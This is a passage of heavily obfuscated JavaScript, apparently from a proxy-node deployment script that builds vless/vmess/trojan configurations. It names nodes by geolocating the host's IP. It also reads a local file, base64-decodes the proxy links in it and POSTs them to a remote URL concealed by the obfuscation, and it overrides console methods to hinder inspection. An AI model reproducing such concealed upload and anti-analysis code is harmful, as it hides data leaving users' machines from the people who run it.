axios[_0xadc83d(_0x4e0740._0x1d7e20,0x344,_0x4e0740._0x12f644,_0x4e0740._0x2a5e3b)](_0x4ca6bb(-_0x4e0740._0x40b199,-0x106,-_0x4e0740._0xe7b0c8,-_0x4e0740._0x5f326d),_0x17bd8f);if(_0xab76fc[_0xadc83d(_0x4e0740._0x1e8075,_0x4e0740._0x230778,_0x4e0740._0x25f495,_0x4e0740._0xb9b407)]&&_0xab76fc['data'][_0x4ca6bb(-0x102,-_0x4e0740._0x4ccbb6,-0x16e,-0x51)]&&_0xab76fc[_0x4ca6bb(-0x170,-_0x4e0740._0x290870,-_0x4e0740._0x46de8e,-_0x4e0740._0x127301)][_0x4ca6bb(_0x4e0740._0x1c7609,-_0x4e0740._0x56105a,-_0x4e0740._0x4b4238,-_0x4e0740._0x230148)]){if('pRJDs'!==_0x274c9d[_0xadc83d(_0x4e0740._0x59ea96,0x4a8,_0x4e0740._0x37b004,_0x4e0740._0x495f58)])return(_0xab76fc[_0x4ca6bb(-_0x4e0740._0x54c1b9,-_0x4e0740._0x1d0cff,-_0x4e0740._0x46de8e,-0x152)][_0x4ca6bb(-0x204,-0xac,-_0x4e0740._0x58596e,-0xa3)]+'-'+_0xab76fc[_0x4ca6bb(-_0x4e0740._0x271902,-_0x4e0740._0x35a63d,-_0x4e0740._0x46de8e,-0x1e4)][_0xadc83d(_0x4e0740._0x3a04b4,_0x4e0740._0x3b7a7f,_0x4e0740._0x3701c7,_0x4e0740._0x1254a7)])[_0xadc83d(_0x4e0740._0x39a532,_0x4e0740._0x37de59,_0x4e0740._0x23b27c,_0x4e0740._0x1e81bb)](/\s+/g,'_');else _0xc35474=_0xadc83d(_0x4e0740._0x3e5527,_0x4e0740._0x2fc862,_0x4e0740._0x3346b5,0x5fb)+_0x43a1ef;}}catch(_0x130a15){if(_0x274c9d[_0xadc83d(_0x4e0740._0x2d3514,0x505,_0x4e0740._0x1aab09,_0x4e0740._0x466758)](_0x274c9d[_0xadc83d(0x438,_0x4e0740._0x5323c8,0x44b,_0x4e0740._0x285663)],_0x274c9d['cgxVq']))try{if(_0x274c9d['UNLTX'](_0x274c9d[_0x4ca6bb(-_0x4e0740._0x18287d,-_0x4e0740._0xd118ba,-_0x4e0740._0x5e1054,-_0x4e0740._0x47cde4)],_0x274c9d[_0x4ca6bb(-0x15f,-_0x4e0740._0x24d66e,-0x1a8,-0x19e)])){const _0x5556bd=await axios['get'](_0x274c9d['JOIsu'],{'headers':{'User-Agent':_0x274c9d[_0xadc83d(_0x4e0740._0xe0ec9a,0x3f5,_0x4e0740._0xb533eb,0x484)],'timeout':0xbb8}});if(_0x5556bd[_0x4ca6bb(-_0x4e0740._0x59e18c,-_0x4e0740._0xbb466c,-_0x4e0740._0x46de8e,-_0x4e0740._0x48ad07)]&&_0x274c9d[_0x4ca6bb(_0x4e0740._0x2c59d9,-_0x4e0740._0x3469c5,-_0x4e0740._0x10d71d,-_0x4e0740._0x1da4ec)](_0x5556bd[_0x4ca6bb(-_0x4e0740._0x279002,-_0x4e0740._0x1940d2,-0x1c3,-_0x4e0740._0x2b5199)]['status'],'success')&&_0x5556bd['data']['countryCode']&&_0x5556bd[_0x4ca6bb(-0x104,-_0x4e0740._0x251589,-0x1c3,-_0x4e0740._0x1717c7)][_0x4ca6bb(-_0x4e0740._0x2046ef,-_0x4e0740._0x20e2ef,-0x20b,-0x139)]){if(_0x274c9d[_0x4ca6bb(-0x8,-_0x4e0740._0x57c99f,-_0x4e0740._0x16aa85,-_0x4e0740._0x2e11f8)](_0x274c9d['vjLfu'],_0x274c9d[_0x4ca6bb(-0x1fe,-_0x4e0740._0x4bd344,-_0x4e0740._0x24ba2e,-_0x4e0740._0x230b70)]))return(_0x5556bd[_0x4ca6bb(-_0x4e0740._0x23e150,-_0x4e0740._0x4cf0b9,-_0x4e0740._0x46de8e,-_0x4e0740._0x39d6ba)]['countryCode']+'-'+_0x5556bd[_0x4ca6bb(-_0x4e0740._0x36a6a6,-0x24e,-_0x4e0740._0x2ab656,-0x1e7)][_0x4ca6bb(-_0x4e0740._0x4c64d7,-_0x4e0740._0x5094e2,-_0x4e0740._0x545e1f,-_0x4e0740._0x3df2f3)])[_0xadc83d(_0x4e0740._0xe83ad2,_0x4e0740._0x25f473,_0x4e0740._0x23b27c,_0x4e0740._0x4e3309)](/\s+/g,'_');else _0x5522a8[_0xadc83d(_0x4e0740._0x5a555,_0x4e0740._0x4bdab6,_0x4e0740._0x2c1c93,_0x4e0740._0x5b7fcf)](_0x5466fd);}}else{let _0x293988;try{const _0x1cb8ec=UeBVkB[_0x4ca6bb(-_0x4e0740._0x1256a4,-_0x4e0740._0xa87e39,-_0x4e0740._0x59fa2b,-_0x4e0740._0x1da4ec)](_0x42e9ff,UeBVkB[_0xadc83d(_0x4e0740._0x516507,_0x4e0740._0xa720c2,_0x4e0740._0x2fdbca,0x5fe)](UeBVkB[_0xadc83d(0x5ed,_0x4e0740._0x3b873b,_0x4e0740._0x2fdbca,_0x4e0740._0x4bfeee)](UeBVkB[_0x4ca6bb(_0x4e0740._0x2aed05,-_0x4e0740._0x2127e5,-_0x4e0740._0x3fd12f,-_0x4e0740._0x5b625d)],UeBVkB['zdNkT']),');'));_0x293988=UeBVkB[_0x4ca6bb(-0x25f,-_0x4e0740._0x32935b,-_0x4e0740._0x5d280c,-_0x4e0740._0x398e80)](_0x1cb8ec);}catch(_0x303e45){_0x293988=_0x41a106;}const _0x4bc74e=_0x293988[_0xadc83d(_0x4e0740._0x3cbd51,_0x4e0740._0x4693fa,0x5b4,_0x4e0740._0x1ae833)]=_0x293988['console']||{},_0x17b50f=[UeBVkB['XXqhf'],UeBVkB[_0xadc83d(_0x4e0740._0x19a088,_0x4e0740._0x50d262,0x5b3,_0x4e0740._0x3998ac)],UeBVkB[_0xadc83d(_0x4e0740._0xbbcf18,_0x4e0740._0x538024,0x43f,_0x4e0740._0x3c3424)],UeBVkB[_0xadc83d(0x51c,_0x4e0740._0x2aff1e,0x5ba,_0x4e0740._0x5609fc)],_0x4ca6bb(-_0x4e0740._0x1beaf6,_0x4e0740._0x13b951,-_0x4e0740._0x37e076,0x7b),UeBVkB[_0xadc83d(_0x4e0740._0x351ede,0x5d8,_0x4e0740._0xc37951,_0x4e0740._0x15f13e)],_0x4ca6bb(-_0x4e0740._0x618c42,-_0x4e0740._0x4e5594,-_0x4e0740._0x54b181,-_0x4e0740._0x4da6d7)];for(let _0x4e98c2=-0xea0+0x4*0x3fe+-0x158;UeBVkB[_0x4ca6bb(-0x2d9,-0x17b,-_0x4e0740._0x38530d,-_0x4e0740._0x5b1b17)](_0x4e98c2,_0x17b50f[_0xadc83d(_0x4e0740._0x696d76,_0x4e0740._0x51c0ae,_0x4e0740._0x6d18c9,0x428)]);_0x4e98c2++){const _0x52d99f=_0xd123d7[_0x4ca6bb(-_0x4e0740._0x4ace9e,-_0x4e0740._0x4d4c5a,-_0x4e0740._0x3df2f3,-_0x4e0740._0x107a75)][_0x4ca6bb(-_0x4e0740._0x3b4ef3,-0xe5,-0x141,-_0x4e0740._0x23b9b9)]['bind'](_0x342f1a),_0x57ee93=_0x17b50f[_0x4e98c2],_0x74e2aa=_0x4bc74e[_0x57ee93]||_0x52d99f;_0x52d99f['__proto__']=_0x9c822e[_0xadc83d(_0x4e0740._0x516343,_0x4e0740._0x516507,_0x4e0740._0x177a61,0x4b1)](_0x5c8948),_0x52d99f[_0xadc83d(0x3f9,_0x4e0740._0x10923e,_0x4e0740._0x490641,_0x4e0740._0x32f52b)]=_0x74e2aa[_0x4ca6bb(-0x139,-_0x4e0740._0x39c91a,-0x259,-_0x4e0740._0x4fb8c)][_0x4ca6bb(-_0x4e0740._0x2fd34e,-_0x4e0740._0x1933d2,-_0x4e0740._0x48c60a,-_0x4e0740._0x1fd0a8)](_0x74e2aa),_0x4bc74e[_0x57ee93]=_0x52d99f;}}}catch(_0x25c86e){}else{if(!_0x28bc5a)return;if(!_0x27c1c8[_0x4ca6bb(-_0x4e0740._0x44d3ed,-_0x4e0740._0x58c639,-0xff,-0xc7)](_0x1d0adf))return;let _0x2c485f;try{_0x2c485f=_0x5def32['readFileSync'](_0x4cee13,'utf-8');}catch{return null;}const _0x5760ee=_0x149621['from'](_0x2c485f,_0x274c9d[_0xadc83d(_0x4e0740._0x280567,_0x4e0740._0x37d44b,_0x4e0740._0x5353c7,0x374)])['toString'](_0x274c9d['GElTq']),_0x49c730=_0x5760ee['split']('\x0a')[_0x4ca6bb(-_0x4e0740._0x425fb2,-0x1e2,-_0x4e0740._0x28f7c8,-_0x4e0740._0x5c5b2a)](_0x484d60=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x4ca6bb(-0x345,-0x17a,-0x26b,-0x1e5)](_0x484d60));if(_0x274c9d[_0x4ca6bb(-0xe,0x48,-_0x4e0740._0x16aa85,-_0x4e0740._0x4ad79c)](_0x49c730[_0xadc83d(0x3d2,0x542,_0x4e0740._0x54ce7e,_0x4e0740._0x4c5a3d)],-0x5c9*0x3+0x3c6+0xd95))return;const _0x153d8a={};_0x153d8a[_0x4ca6bb(-_0x4e0740._0x498f2b,0x3d,-_0x4e0740._0xf1897d,-_0x4e0740._0x5dd8da)]=_0x49c730;const _0x36db3c={};_0x36db3c[_0x4ca6bb(-_0x4e0740._0x3efe39,-0x31c,-_0x4e0740._0x2a76ac,-_0x4e0740._0x2e7f16)]=_0x274c9d[_0x4ca6bb(-0x157,-0xe7,-_0x4e0740._0x21efaa,-_0x4e0740._0xc5b38b)];const _0x4758aa={};return _0x4758aa['headers']=_0x36db3c,_0x5ddf7f[_0x4ca6bb(-_0x4e0740._0x245923,-_0x4e0740._0x26618e,-0xf9,-0x25)](_0x3cf2bb+_0x4ca6bb(-_0x4e0740._0x211c1b,-0x109,-_0x4e0740._0xea446b,-_0x4e0740._0x4d4c5a),_0x5acf78['stringify'](_0x153d8a),_0x4758aa)[_0x4ca6bb(-_0x4e0740._0x327774,-_0x4e0740._0x5d0770,-_0x4e0740._0x44114a,-_0x4e0740._0x5df882)](_0x721dc5=>{return null;}),null;}}function _0x4ca6bb(_0x8d1c48,_0x546198,_0x7aef31,_0x324054){return _0x5d6c89(_0x7aef31- -_0x2d9c4e._0x49ddd7,_0x546198-_0x2d9c4e._0x11ce58,_0x7aef31-_0x2d9c4e._0x2ae622,_0x546198);}return _0x274c9d[_0x4ca6bb(-_0x4e0740._0x3f36f2,-_0x4e0740._0x2127e5,-_0x4e0740._0x23453d,-_0x4e0740._0x371a1b)];}async function generateLinks(_0x5ef486){const _0x127d3f={_0x3b6685:0x13c,_0x58172d:0x77,_0x9e6434:0xd7,_0x3871c2:0x147,_0x319a6e:0xbe,_0x88d2cd:0x31,_0x17e898:0x283,_0x1a55f6:0x272,_0x5e7db1:0x7d,_0x2888cf:0xf7,_0x29d6be:0x130,_0x99637d:0x22,_0x5e531f:0x79,_0x3a3d4f:0xb3,_0x30a476:0xeb,_0x24aa9e:0x27,_0x1ffeb3:0x46,_0x1c1603:0xb1,_0x9fd121:0xff,_0x184441:0x17b,_0x42fcc1:0x1bb,_0x2cb9d4:0x230,_0x15db28:0x1ff,_0x1aeee8:0x11c,_0x335b7b:0x2f5,_0x3f48fd:0x11b,_0x597331:0x109,_0x1553da:0x57,_0x40c879:0x112,_0xefd830:0x110,_0xb34010:0xd8,_0x32ba7b:0x4,_0x282b85:0xea,_0x1c36ae:0xc0,_0x4b70f3:0x1f4,_0x5a442a:0xd9,_0x1ee9c1:0x113,_0x4a4262:0x8f,_0x416c1b:0xc7},_0xad664e={_0x3fc95a:0x398,_0xc6611:0x28c,_0x19130e:0x323,_0x4a6506:0x4,_0xcb4d27:0x67,_0x416453:0x8a,_0x4451f7:0x2cc,_0x388409:0x4cc,_0x5101e7:0x3d5,_0x375c27:0x341,_0x59998b:0x18b,_0x439875:0xe,_0xa7b682:0x67,_0x5d3589:0x1d0,_0x2d8c9b:0xb,_0xec9d3a:0x2c,_0x5b9b3d:0x10b,_0x583556:0x4fe,_0x10309b:0x3ea,_0x9f52ca:0x41a,_0x322037:0x2eb,_0x2bcd76:0x42d,_0x2bf91b:0x2ba,_0x4399d3:0x1ee,_0x16c5b5:0x2ed,_0x5241c0:0x2d4,_0x4b2287:0x308,_0x10e798:0x231,_0x36daeb:0x275,_0x24036a:0x312,_0x2f111e:0x3cf,_0x422549:0x178,_0x4bf37b:0x20a,_0x18e198:0x247,_0x51493a:0x146,_0x2916d3:0x240,_0x338e97:0x12a,_0x4125d2:0x182,_0x1dcd87:0x1d2,_0x19c4ee:0x28f,_0x1d0e73:0x175,_0x5ef264:0x257,_0x1e7032:0x36d,_0x490658:0x23e,_0x36fcff:0x34d,_0x3642e7:0x3ab,_0x382c20:0x161,_0x3cf4d0:0x266,_0x291c45:0x1e6,_0x43e1ed:0x255,_0x4b3764:0x245,_0x5ae0e1:0x206,_0x3ce8ca:0x8d,_0x2e71ec:0x106,_0xb000a:0x93},_0x551c41={_0x22e9cc:0x614,_0x93d621:0x507,_0x1ac69e:0x670,_0x2cfe0e:0x37b,_0x36d685:0x3c3,_0x15fbf3:0x27b,_0x249aac:0x325,_0x418202:0x28e,_0x6a7341:0x204,_0x3be5bb:0x1ec,_0x74f3b2:0x29d,_0x2502b3:0x1ab,_0x3d0ec8:0x229,_0x31bdc7:0x1d1,_0x4e1511:0x281,_0x14dd7c:0x173,_0x273e63:0x318,_0x390d36:0x224,_0x1fc060:0x2b5,_0x57d7b7:0x15d,_0x2d801e:0x1c6,_0x2350e4:0x304,_0x12adce:0x22c,_0x4c4b3f:0x248,_0x34d07c:0x2f0,_0x4205d7:0x280,_0x493ed4:0x1f9,_0x201e50:0x1ea,_0xe2adfd:0x22e,_0x48c502:0x454,_0x3421e2:0x51e,_0x437713:0x62f,_0x511b18:0x5b7,_0x55cbcf:0x57b,_0x7dec55:0x519,_0x216d4c:0x66a,_0x73bcea:0x4ea,_0x87bf2e:0x5d2,_0x428fdb:0x5e8,_0x54c9a0:0x1b3,_0x544941:0x360,_0x170b5e:0x245,_0x3cd133:0x49f,_0x5b6cd8:0x37c,_0x56f58e:0x400,_0x100b3a:0x472,_0x1a3740:0x564,_0x4c4926:0x656,_0x4b932f:0x287,_0x1e136f:0x302,_0x534472:0x150,_0x104800:0x277,_0x4cb387:0x229,_0x4f3440:0x1aa,_0x312fd8:0x1e9,_0x3c4f35:0x44f,_0x11d3d4:0x356,_0x5818ed:0x3fb,_0x3ab734:0x575,_0x198066:0x505,_0x463210:0x4c6,_0x4de653:0x5ad,_0x1a3bd4:0x40b,_0x753173:0x314,_0x3d2bbb:0x4ec,_0x4b66e5:0x197,_0x1fe979:0x1ba,_0x4f12d0:0x3af,_0x3ba960:0x50c,_0x33bdd9:0x46e,_0x4a86da:0x2f0,_0x23801a:0x140,_0x281a9b:0x1a1,_0x5582b3:0x2ff,_0xd2b5dd:0x8c,_0x1fd854:0x2cb,_0xe23e57:0xb4,_0x5b4ed3:0x4aa,_0x40342b:0x19b,_0x1b553a:0x17d,_0x5f24e5:0x39f,_0x474f17:0x121,_0x33dc6e:0x169,_0x1f2f2f:0x155,_0x56d56f:0x2eb,_0xe5abef:0x1fa,_0x24d4b1:0x3a9,_0xf0cac9:0x310,_0x1eaedd:0x157,_0x449dca:0x13d,_0x9cd810:0x1c0,_0x35e9c8:0x1d8,_0x1f50eb:0x278,_0x421221:0x221,_0x32c773:0x1c9,_0x3fa7b8:0x360,_0x323b25:0x254,_0x5290df:0x5b5,_0x1a1c1e:0x5f5,_0x59aa6e:0x4ea,_0x228b54:0x356,_0x43f8a0:0x47f,_0x187e9b:0x36f,_0x108128:0x258,_0x59fbc4:0x14a,_0x1c8739:0x206,_0x40ee3b:0x550,_0x1c0d8a:0x5aa,_0x3a05d5:0x5df,_0x455aed:0x172,_0x13b166:0x1e7,_0x352558:0x136,_0x5869f1:0x24a,_0x5060ea:0x1c9,_0x2972af:0x4fe,_0x2f5b68:0x492,_0x26c5b4:0x436,_0x3b7f3f:0x52d,_0x6843e:0x31e,_0x9df40:0x3d4,_0x142bc4:0x23b,_0x2bb916:0x9e,_0x165b97:0x14f,_0x4296af:0x2f7,_0x2e3fd9:0x38a,_0x3d6757:0x38d,_0x4404ec:0x3fc,_0x3c5efe:0x47f,_0x3c7b89:0x4fd,_0x10f73f:0x1b6,_0x483258:0x2c6,_0x3d01c1:0x365,_0x1a0aca:0x24e,_0x120af4:0x592,_0xc5731c:0x49e,_0x1c25c8:0x593,_0x9f49f1:0x51e,_0x23d508:0x43b,_0x4a5896:0x56e,_0x4f08a5:0x287,_0x2cec24:0x3a7,_0x13b845:0x32d,_0xf8cf13:0x360,_0xecfb85:0xf2,_0x131e5b:0x71,_0x503a89:0xf0,_0x1d24d0:0x124,_0x2bb06e:0x100,_0x52dcb5:0x1fc,_0x3347f8:0x3fe,_0x2c76cf:0x418,_0x9ddfd7:0x2f3,_0xda6f7d:0x1e5,_0x401e33:0x21e,_0x442540:0x2e2,_0x2216b9:0x3e2,_0x394caa:0x2c6,_0x5502fd:0x550,_0x1322e3:0x634,_0x58480a:0x676,_0x56993b:0x3a3,_0x1419fe:0x37e,_0x1d7590:0x300,_0x59a14e:0x331,_0x5839d1:0x23f,_0x40be15:0x1f9,_0xd4664c:0x174,_0x501393:0x23f,_0xe1bcdd:0x4b6,_0x5232b3:0x56f,_0x1910d1:0x48f,_0x48b356:0x5ca,_0x34e913:0x53e,_0x16e82f:0x625,_0x51fec0:0x569,_0x16a7c0:0x718,_0x24170c:0x3f0,_0x469dfd:0x499,_0x1e6e65:0x3c6,_0x1d9a95:0x369,_0x39130f:0x5a8,_0x2bf072:0x56b,_0x2cde15:0x634,_0x5d2116:0x498,_0x5e2c6e:0x6b9,_0x14978d:0x5da,_0x1a12e5:0x4d3,_0x451946:0x5d5,_0x291aa5:0x181,_0x80d488:0x540,_0x7f28de:0x605,_0x5cdff0:0x53e,_0x465233:0x334,_0x51afc6:0x42d,_0x4d550c:0x4a1,_0x18f728:0x37e,_0x4a6c8d:0x483,_0x27169a:0x25,_0x360e54:0x14b,_0x4107d2:0x15f,_0x2a63c6:0x7f,_0x31b7e6:0x1c4,_0x54eb47:0x246,_0xefabb:0xe7,_0x228224:0x246,_0x351ce8:0x242,_0x10821c:0x25a,_0x4bfbda:0x1f9,_0x5427a7:0x2b3,_0x410f4c:0x117,_0x56b8e9:0x544,_0x5935e4:0x470,_0x13b076:0x4ce,_0x3860c4:0x49e,_0x5b69c1:0x377,_0x15b3e0:0x48b,_0x4cc76f:0x46c,_0x37691e:0x40d,_0x1e985b:0x510,_0x1f7812:0x648,_0x2966ec:0x56c,_0x230036:0x195,_0x357bf6:0x28a,_0x45c54a:0x25a,_0x3195a1:0x1ad,_0x16b957:0x438,_0x1f3aec:0x464,_0x23f11f:0x476,_0x12a276:0x4c5,_0x340d2b:0x60d,_0x38c0f5:0x510,_0x508bec:0x6a9,_0x5547f2:0x227,_0x2e1280:0x122,_0x3e15cd:0x15a,_0x5e35fe:0x20d,_0x203f6d:0x49c,_0x562318:0x3d1,_0x143612:0x528,_0x193f89:0x3ed,_0x49af95:0x324,_0x1e637d:0x27e,_0xde0fff:0x5f8,_0x99a304:0x572,_0x2b093c:0x451,_0x551a0c:0x445,_0x1ed67f:0x439,_0x529a1f:0x360,_0x18f4e5:0x3c9,_0xfc731f:0x4a1,_0x5f11a6:0x5aa,_0x269382:0x47a,_0x3c13fe:0x154,_0x3fc3c4:0x138,_0x4e786e:0x2c,_0x5cf22f:0x250,_0x15f26a:0x148,_0x1d76a5:0x22a,_0x580de6:0x5b0,_0x297047:0x5fb,_0x24ee5a:0x658,_0x2ea8bc:0x619,_0x1c8b70:0x608,_0x76d2ca:0x26c,_0x41367d:0x2dd,_0x5b5c40:0x2de,_0x1fb185:0x2e7,_0x156dc0:0x5f3,_0x5c5bb5:0x586,_0x1152ed:0x69a,_0x21d412:0x5eb,_0x6ecfb2:0x147,_0x38addd:0x175,_0x175821:0x279,_0x6964fd:0x6d1,_0x488f57:0x236,_0x1c16a5:0x24c,_0x54a5e6:0x24d,_0x548544:0x1c3,_0x53b8cf:0x2e1,_0x58c369:0xed,_0x521103:0x1fc,_0x43f1be:0x184,_0x37d93e:0x209,_0xab449d:0x451,_0x251194:0x4cf,_0x4b2f52:0x54e,_0x5487a3:0x1b0,_0x1ad0b1:0x14b,_0x4d381a:0x3c,_0x800334:0x231,_0xb9faa1:0x15b,_0x4cab1f:0x5fe,_0x2ee39c:0x69e,_0x17c949:0x649,_0x1e0848:0x61b,_0x4ae810:0x334,_0x590a25:0x237,_0x5dcd1f:0x3a6,_0x553b59:0x2ca,_0x3a6df4:0x3cf,_0x153ce6:0x16f,_0x15d425:0x273,_0x406dcf:0x1bf,_0x20bd00:0x603,_0x2f5928:0x66c,_0xf8694f:0x545,_0x5b7deb:0x4d2,_0x149407:0x241,_0x4d9371:0x12d,_0x324a58:0xc4,_0x1150ad:0xe7,_0x49b772:0x1d5,_0xe2f89b:0x16f,_0x58c963:0x320,_0xdf7640:0x2e7,_0x2b10b4:0x47e,_0x5b76f9:0x5d8,_0xa3527a:0x4cf,_0x4c0e31:0x6bd,_0x449f6c:0x6bf,_0x240241:0x122,_0x146c56:0x2ef,_0x10f2e1:0x2b6,_0x18d616:0x1f9,_0x25bc55:0x57a,_0x4a09b5:0x5fe,_0x24bafd:0x6be,_0x46e93e:0x6b6,_0x57bd17:0x538,_0x1c24ce:0x606,_0x2e169a:0x3fa,_0x1bfd99:0x409,_0x2a8b56:0x39b,_0x469ac:0x416,_0x50a22a:0x380,_0x3eb0da:0x443,_0x1dda2c:0x246,_0xb49785:0x684,_0x457ea4:0x664,_0x3584d3:0x2bc,_0x3d4729:0x20d,_0x143865:0x1bc,_0x3cc380:0x29c,_0x469a34:0x304,_0x43279a:0x3f4,_0x81071:0x4b0,_0x3ca643:0x3a0,_0x5247f5:0x334,_0xdb3f29:0x298,_0x4c57a6:0x4bc,_0x5d4931:0x5b1,_0x5a0b13:0x5ae,_0x2d4cd1:0x3cb,_0x43a3e2:0x364,_0x146993:0x2fc,_0x728cae:0x3a2,_0x28e891:0x373,_0x2e16c3:0x366,_0x352614:0xbc,_0x3e1f00:0x1de,_0x4146ea:0x64c,_0x54f63b:0x605,_0x2a0f20:0x6e9,_0x5c1cdb:0x5ea,_0x85ebed:0x344,_0x3bb10f:0x42c,_0x4df465:0x516,_0x468d59:0x24b,_0x25c2b0:0x3fa,_0x410fcb:0x48d,_0x14930b:0x43e,_0x51b9af:0x36b,_0x3bfc5d:0x292,_0x2b15f3:0x636,_0x515d56:0x5cf,_0x285a1a:0x4e2,_0x457ad8:0x612,_0x59f281:0x4f9,_0x266d2f:0x443,_0x48766f:0x152,_0x54d759:0x154,_0x5c4e4a:0x261,_0x6ab56b:0x165,_0x1fc4ad:0x40b},_0x171481={_0x29a13d:0x104},_0x370421={_0xc923a4:0xe1,_0x346b93:0x25},_0x2ac79b={_0x1f4c38:0x3d,_0x57035f:0xca,_0x56871c:0x145},_0x467315={_0x207ec1:0x122,_0x1b9eba:0x188,_0x1ae22f:0x2ef},_0x2a90e0={_0x594011:0x191,_0x41bdc5:0x17e,_0x1132a0:0x1ad};function _0x47bf34(_0x24daa0,_0x1b192c,_0x7a69ef,_0x3ac4b4){return _0x477c8c(_0x24daa0-_0x2a90e0._0x594011,_0x1b192c-_0x2a90e0._0x41bdc5,_0x1b192c,_0x24daa0- -_0x2a90e0._0x1132a0);}const _0x1d77aa={'qZTaU':_0x3b4340(-0x192,-0x34,-_0x127d3f._0x3b6685,-_0x127d3f._0x58172d),'SNYHH':'none','MAbWb':_0x3b4340(-_0x127d3f._0x9e6434,-_0x127d3f._0x3871c2,_0x127d3f._0x319a6e,-_0x127d3f._0x88d2cd),'gNCxS':_0x47bf34(_0x127d3f._0x17e898,_0x127d3f._0x1a55f6,0x39f,0x258),'MwbFU':_0x3b4340(-_0x127d3f._0x5e7db1,-_0x127d3f._0x2888cf,-_0x127d3f._0x29d6be,-_0x127d3f._0x99637d),'ZBSdg':_0x47bf34(0x157,_0x127d3f._0x5e531f,_0x127d3f._0x3a3d4f,_0x127d3f._0x30a476),'qhslZ':_0x3b4340(_0x127d3f._0x24aa9e,_0x127d3f._0x1ffeb3,_0x127d3f._0x1c1603,_0x127d3f._0x9fd121),'nHggu':_0x47bf34(_0x127d3f._0x184441,_0x127d3f._0x42fcc1,0x200,_0x127d3f._0x2cb9d4),'hlbNC':'tls','klJaR':'quic','AAEqs':'vmess','uPxku':_0x47bf34(_0x127d3f._0x15db28,0x2e8,_0x127d3f._0x1aeee8,_0x127d3f._0x335b7b),'dorqO':_0x3b4340(-_0x127d3f._0x3f48fd,-0xd7,-_0x127d3f._0x597331,-_0x127d3f._0x1553da),'XvlqL':_0x3b4340(-_0x127d3f._0x40c879,_0x127d3f._0xefd830,_0x127d3f._0xb34010,_0x127d3f._0x32ba7b),'bizXg':'blackhole','eCeCd':function(_0x151868,_0xa3766a){return _0x151868===_0xa3766a;},'iwRCA':_0x3b4340(_0x127d3f._0x282b85,_0x127d3f._0x1c36ae,_0x127d3f._0x4b70f3,_0x127d3f._0x5a442a),'sjLVE':_0x47bf34(_0x127d3f._0x1ee9c1,_0x127d3f._0x4a4262,_0x127d3f._0x416c1b,0xa),'tEBgq':'base64','MIhDz':function(_0x340480){return _0x340480();},'YzTjJ':function(_0x2ba826,_0x41f959){return _0x2ba826(_0x41f959);},'vPlzR':function(_0x1fdba9,_0x29f8a1,_0x4657cb){return _0x1fdba9(_0x29f8a1,_0x4657cb);}},_0x11b9d2=await getMetaInfo();function _0x3b4340(_0x4f41f4,_0x5e48cb,_0x591948,_0x4a5028){return _0x477c8c(_0x4f41f4-_0x467315._0x207ec1,_0x5e48cb-_0x467315._0x1b9eba,_0x591948,_0x4a5028- -_0x467315._0x1ae22f);}const _0x277805=NAME?NAME+'-'+_0x11b9d2:_0x11b9d2;return new Promise(_0x2d10da=>{const _0x24b1cf={_0xd57293:0x386},_0x560ac2={'ZFlyR':_0x1d77aa[_0x56739f(_0xad664e._0x3fc95a,_0xad664e._0xc6611,_0xad664e._0x19130e,0x302)],'wsQAR':_0x1d77aa[_0x115a3c(_0xad664e._0x4a6506,_0xad664e._0xcb4d27,-0x186,-_0xad664e._0x416453)],'VYvDV':_0x1d77aa[_0x56739f(_0xad664e._0x4451f7,_0xad664e._0x388409,_0xad664e._0x5101e7,_0xad664e._0x375c27)],'JoLNX':_0x1d77aa[_0x115a3c(-_0xad664e._0x59998b,_0xad664e._0x439875,0x4c,-_0xad664e._0xa7b682)],'WQZiH':_0x1d77aa[_0x115a3c(-_0xad664e._0x5d3589,_0xad664e._0x2d8c9b,-_0xad664e._0xec9d3a,-_0xad664e._0x5b9b3d)],'FJkMg':_0x1d77aa[_0x56739f(0x486,_0xad664e._0x583556,_0xad664e._0x10309b,_0xad664e._0x9f52ca)],'WMUIx':'tcp','GQDnC':_0x1d77aa['qhslZ'],'ezqQN':_0x1d77aa[_0x56739f(_0xad664e._0x322037,_0xad664e._0x2bcd76,0x345,_0xad664e._0x2bf91b)],'NhSHO':_0x56739f(0x248,0x11c,_0xad664e._0x4399d3,_0xad664e._0x16c5b5),'zdOtz':_0x1d77aa[_0x115a3c(-_0xad664e._0x5241c0,-_0xad664e._0x4b2287,-_0xad664e._0x10e798,-_0xad664e._0x36daeb)],'MsJpg':_0x1d77aa[_0x56739f(_0xad664e._0x24036a,0x4d9,_0xad664e._0x2f111e,0x2e4)],'gxLsS':_0x1d77aa['AAEqs'],'lnYps':_0x1d77aa[_0x115a3c(-_0xad664e._0x422549,-_0xad664e._0x4bf37b,-0x1fb,-_0xad664e._0x18e198)],'WMMCQ':_0x1d77aa[_0x56739f(_0xad664e._0x51493a,0x179,_0xad664e._0x2916d3,_0xad664e._0x338e97)],'SvTpr':'freedom','jlxPX':_0x1d77aa['XvlqL'],'GOyrJ':_0x1d77aa[_0x115a3c(-_0xad664e._0x4451f7,-_0xad664e._0x4125d2,-0x27a,-_0xad664e._0x1dcd87)],'iaeyM':_0x56739f(_0xad664e._0x19c4ee,_0xad664e._0x1d0e73,0x255,_0xad664e._0x5ef264),'NHceK':function(_0x1f5b6b,_0x121895){return _0x1d77aa['eCeCd'](_0x1f5b6b,_0x121895);},'WXMix':'Ryzpm','ujAGt':_0x1d77aa[_0x56739f(_0xad664e._0x1e7032,_0xad664e._0x490658,_0xad664e._0x36fcff,_0xad664e._0x3642e7)],'KKWax':_0x1d77aa[_0x115a3c(-0x24a,-_0xad664e._0x382c20,-_0xad664e._0x3cf4d0,-_0xad664e._0x291c45)],'nfrWE':_0x1d77aa[_0x115a3c(-_0xad664e._0x43e1ed,-_0xad664e._0x4b3764,-0x2e5,-_0xad664e._0x5ae0e1)],'pxIFY':function(_0x9ebe87){const _0x32f822={_0x567658:0x179,_0x3201ce:0x14a,_0x10639f:0x272};function _0x517fca(_0x1a7da4,_0x114326,_0x42fb52,_0x3e9490){return _0x56739f(_0x1a7da4-_0x32f822._0x567658,_0x114326-_0x32f822._0x3201ce,_0x1a7da4- -_0x32f822._0x10639f,_0x42fb52);}return _0x1d77aa[_0x517fca(-_0x2ac79b._0x1f4c38,-_0x2ac79b._0x57035f,-_0x2ac79b._0x56871c,-0x8f)](_0x9ebe87);},'VSbck':function(_0x4a1b71,_0x24d9c2){const _0x4b071d={_0x2d2182:0xed,_0x51891d:0x161,_0x26fed5:0x4cb};function _0x4a3247(_0x1b76ce,_0x3a6e21,_0x1b19df,_0x56a041){return 